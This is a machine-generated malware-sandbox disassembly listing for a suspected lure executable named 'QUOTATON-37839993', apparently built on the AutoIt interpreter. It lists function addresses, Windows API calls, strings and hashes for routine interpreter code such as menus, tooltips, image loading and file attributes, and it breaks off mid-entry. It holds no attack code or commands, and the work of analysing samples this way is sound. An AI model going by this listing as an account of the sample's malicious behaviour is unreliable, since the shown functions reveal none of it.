                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load$Info
                                                                      • String ID:
                                                                      • API String ID: 2577412497-0
                                                                      • Opcode ID: 894b64f16ba2c2b6bc770e327e674ff006e08052b88c768ad1a5a20d0b385350
                                                                      • Instruction ID: 4e1ccf5132cdd94056eaee60b240f9ae989e85833c325ef7ccbd0414d956a7f6
                                                                      • Opcode Fuzzy Hash: 894b64f16ba2c2b6bc770e327e674ff006e08052b88c768ad1a5a20d0b385350
                                                                      • Instruction Fuzzy Hash: F131F4B1D4831A6ADF109FB68C8999FBFE8FF04754F50452AE50DF7281DA7865008FA1
                                                                      Function 00E8A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E8A259
                                                                      • DestroyWindow.USER32(?,?), ref: 00E8A2D3
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E8A34D
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E8A36F
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A382
                                                                      • DestroyWindow.USER32(00000000), ref: 00E8A3A4
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E00000,00000000), ref: 00E8A3DB
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E8A3F4
                                                                      • GetDesktopWindow.USER32 ref: 00E8A40D
                                                                      • GetWindowRect.USER32(00000000), ref: 00E8A414
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E8A42C
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E8A444
                                                                        • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 1297703922-3619404913
                                                                      • Opcode ID: 449b7358463150c16088676e4e42261ecce96fa230a4cca206e690864cd19502
                                                                      • Instruction ID: 9accd3c133808646f65f11376e4af99cb810e9ac7c0ca59a0bf4d678083e022e
                                                                      • Opcode Fuzzy Hash: 449b7358463150c16088676e4e42261ecce96fa230a4cca206e690864cd19502
                                                                      • Instruction Fuzzy Hash: 4771C171140204AFEB24DF28CC49F6A77E6FB88304F08452DF99DA72A0D771E94ADB52
                                                                      Function 00E84392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00E84424
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E8446F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      • Opcode ID: 4e48fd46fda4329c75368fe518b0a393bcf1a92bc4b130c33a163adeb561f767
                                                                      • Instruction ID: bdd0d605bf75c2ffc1dde49353d541034d9571de53d6a9fa8a82fa2049750ab3
                                                                      • Opcode Fuzzy Hash: 4e48fd46fda4329c75368fe518b0a393bcf1a92bc4b130c33a163adeb561f767
                                                                      • Instruction Fuzzy Hash: C4913BB02043119BCB04EF10C451AAEB7E1EF95354F44A869E89A7B3E3DB31ED49CB91
                                                                      Function 00E8B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E8B8B4
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E891C2), ref: 00E8B910
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B949
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E8B98C
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E8B9C3
                                                                      • FreeLibrary.KERNEL32(?), ref: 00E8B9CF
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E8B9DF
                                                                      • DestroyIcon.USER32(?,?,?,?,?,00E891C2), ref: 00E8B9EE
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E8BA0B
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E8BA17
                                                                        • Part of subcall function 00E22EFD: __wcsicmp_l.LIBCMT ref: 00E22F86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 1212759294-1154884017
                                                                      • Opcode ID: 67e788c1fdad07bda7d4d6a16fbf1f810a575f2bcdd006a85eac8818c0e44469
                                                                      • Instruction ID: fdac2a920d22e019541a57c2a3ca7dd2476bae82a9f20576939341d339c94cef
                                                                      • Opcode Fuzzy Hash: 67e788c1fdad07bda7d4d6a16fbf1f810a575f2bcdd006a85eac8818c0e44469
                                                                      • Instruction Fuzzy Hash: 8861F071900215BEEB18EF64DC41FBE7BACEB08710F10811AFA19F61D1DB749994DBA0
                                                                      Function 00E6A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • CharLowerBuffW.USER32(?,?), ref: 00E6A3CB
                                                                      • GetDriveTypeW.KERNEL32 ref: 00E6A418
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A460
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A497
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6A4C5
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 2698844021-4113822522
                                                                      • Opcode ID: 842f1cf2940ccf4c260aacb2bf06a54c1333e5f3fc6491b9011ba6924868ffd9
                                                                      • Instruction ID: d8fca62e88eaab3e3a379563053067e924d6bd36845f2482c0d1aa1aee1a1154
                                                                      • Opcode Fuzzy Hash: 842f1cf2940ccf4c260aacb2bf06a54c1333e5f3fc6491b9011ba6924868ffd9
                                                                      • Instruction Fuzzy Hash: A1514B715043059FC700EF10C99186BB7E8EF94758F04A86DF89A772A2DB31AD4ACF52
                                                                      Function 00E5F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00E3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00E5F8DF
                                                                      • LoadStringW.USER32(00000000,?,00E3E029,00000001), ref: 00E5F8E8
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00E3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00E5F90A
                                                                      • LoadStringW.USER32(00000000,?,00E3E029,00000001), ref: 00E5F90D
                                                                      • __swprintf.LIBCMT ref: 00E5F95D
                                                                      • __swprintf.LIBCMT ref: 00E5F96E
                                                                      • _wprintf.LIBCMT ref: 00E5FA17
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E5FA2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 984253442-2268648507
                                                                      • Opcode ID: ac8c36be403fe4ee97160254c3993f75bbb7d25333b8c995cc40df1658517f91
                                                                      • Instruction ID: 2fb9c485aaaea2394f28237cb5a5380ef45b16cad78fc4ccff5f6633fde830a3
                                                                      • Opcode Fuzzy Hash: ac8c36be403fe4ee97160254c3993f75bbb7d25333b8c995cc40df1658517f91
                                                                      • Instruction Fuzzy Hash: 0D412C72C04219AACF04FBE0DD86DEEB7B8AF58301F502465F605761A2EA356F49CB61
                                                                      Function 00E8BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E89207,?,?), ref: 00E8BA56
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA6D
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA78
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA85
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E8BA8E
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BA9D
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E8BAA6
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BAAD
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E89207,?,?,00000000,?), ref: 00E8BABE
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E92CAC,?), ref: 00E8BAD7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E8BAE7
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00E8BB0B
                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00E8BB36
                                                                      • DeleteObject.GDI32(00000000), ref: 00E8BB5E
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E8BB74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: b802d86205420bc6c2c7284adc4a364a930b17b106044138b3cf85cf93bb58a8
                                                                      • Instruction ID: d16925126450d1fd4a4a81436a87bb36583e3e332eb30714595c770bce9505b6
                                                                      • Opcode Fuzzy Hash: b802d86205420bc6c2c7284adc4a364a930b17b106044138b3cf85cf93bb58a8
                                                                      • Instruction Fuzzy Hash: 05410975600204EFDB119FA6DC88EAABBB8FB89715F104169F90DE7261D7309D05DB60
                                                                      Function 00E6D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 00E6DA10
                                                                      • _wcscat.LIBCMT ref: 00E6DA28
                                                                      • _wcscat.LIBCMT ref: 00E6DA3A
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E6DA4F
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DA63
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00E6DA7B
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E6DA95
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6DAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                      • String ID: *.*
                                                                      • API String ID: 34673085-438819550
                                                                      • Opcode ID: 5ab1ed6779d1690849c439a2f30650965c56e6c1acfb9b8431cbb85382ff7ade
                                                                      • Instruction ID: 641926b964d6b47f7854f1bed2b54d0643f8b8f8659e13911a8ca7bb356dbbd8
                                                                      • Opcode Fuzzy Hash: 5ab1ed6779d1690849c439a2f30650965c56e6c1acfb9b8431cbb85382ff7ade
                                                                      • Instruction Fuzzy Hash: 9081C571A483009FCB24DF64DC449AAB7E4BFC9394F58AC2EF489EB251D670D944CB52
                                                                      Function 00E8C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E8C1FC
                                                                      • GetFocus.USER32 ref: 00E8C20C
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00E8C217
                                                                      • _memset.LIBCMT ref: 00E8C342
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E8C36D
                                                                      • GetMenuItemCount.USER32(?), ref: 00E8C38D
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00E8C3A0
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E8C3D4
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E8C41C
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E8C454
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E8C489
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1296962147-4108050209
                                                                      • Opcode ID: 14ba9b244be1e7c986e50a3d9539e43ae6959993197c5cd571ec7fb337acb54a
                                                                      • Instruction ID: 0813d992180ffa69d52be2e2f19249ba9e261f9c0c535f24fd0e763a95c7240d
                                                                      • Opcode Fuzzy Hash: 14ba9b244be1e7c986e50a3d9539e43ae6959993197c5cd571ec7fb337acb54a
                                                                      • Instruction Fuzzy Hash: A2819E712083019FD710EF14D894A6BBBE4FB89318F20592EF99DB72A1D770D945CB62
                                                                      Function 00E7731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00E7738F
                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E7739B
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00E773A7
                                                                      • SelectObject.GDI32(00000000,?), ref: 00E773B4
                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E77408
                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E77444
                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E77468
                                                                      • SelectObject.GDI32(00000006,?), ref: 00E77470
                                                                      • DeleteObject.GDI32(?), ref: 00E77479
                                                                      • DeleteDC.GDI32(00000006), ref: 00E77480
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00E7748B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 03f06cd0fdf73297c65755e4e6d76b3c6a39a64fe6510fcd445d794d02949b53
                                                                      • Instruction ID: 0374e428d7a9dd63cb1fb46b06af37859a148e6d7505738d98ca8e633c55f5a5
                                                                      • Opcode Fuzzy Hash: 03f06cd0fdf73297c65755e4e6d76b3c6a39a64fe6510fcd445d794d02949b53
                                                                      • Instruction Fuzzy Hash: E5514775904309EFCB14CFA9CC84EAEBBB9EF48310F148529F99AA7251D731A944DB50
                                                                      Function 00E06A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E20957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E06B0C,?,00008000), ref: 00E20973
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06BAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E06CFA
                                                                        • Part of subcall function 00E0586D: _wcscpy.LIBCMT ref: 00E058A5
                                                                        • Part of subcall function 00E2363D: _iswctype.LIBCMT ref: 00E23645
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 537147316-1018226102
                                                                      • Opcode ID: 46d143f53d0ca72e962d22bd3fe1709706719b640963a8930a571dc45be519da
                                                                      • Instruction ID: 3df62ccec88ad97b8d2b9f44d145e4ca0eee0a266fa9d61d3a4b57e307a6ec7f
                                                                      • Opcode Fuzzy Hash: 46d143f53d0ca72e962d22bd3fe1709706719b640963a8930a571dc45be519da
                                                                      • Instruction Fuzzy Hash: 32029E711083419FC714EF24C881AAFBBE5AF98314F14681EF4D6A72E1DB30D989CB52
                                                                      Function 00E62D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62D50
                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E62DDD
                                                                      • GetMenuItemCount.USER32(00EC5890), ref: 00E62E66
                                                                      • DeleteMenu.USER32(00EC5890,00000005,00000000,000000F5,?,?), ref: 00E62EF6
                                                                      • DeleteMenu.USER32(00EC5890,00000004,00000000), ref: 00E62EFE
                                                                      • DeleteMenu.USER32(00EC5890,00000006,00000000), ref: 00E62F06
                                                                      • DeleteMenu.USER32(00EC5890,00000003,00000000), ref: 00E62F0E
                                                                      • GetMenuItemCount.USER32(00EC5890), ref: 00E62F16
                                                                      • SetMenuItemInfoW.USER32(00EC5890,00000004,00000000,00000030), ref: 00E62F4C
                                                                      • GetCursorPos.USER32(?), ref: 00E62F56
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00E62F5F
                                                                      • TrackPopupMenuEx.USER32(00EC5890,00000000,?,00000000,00000000,00000000), ref: 00E62F72
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E62F7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 3993528054-0
                                                                      • Opcode ID: 81052a70a024ef18f110571003c392a89e9af818d68948f49fb20b0a8abb2687
                                                                      • Instruction ID: 44dc1bcfafd68e28909b6725a5e5fae3b997602f97dbf87f838f7c9f3c5c9709
                                                                      • Opcode Fuzzy Hash: 81052a70a024ef18f110571003c392a89e9af818d68948f49fb20b0a8abb2687
                                                                      • Instruction Fuzzy Hash: E1710770681A05BEEB228F54EC49FAABF64FF043A8F10122AF719BA1E1C7725C10D751
                                                                      Function 00E788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
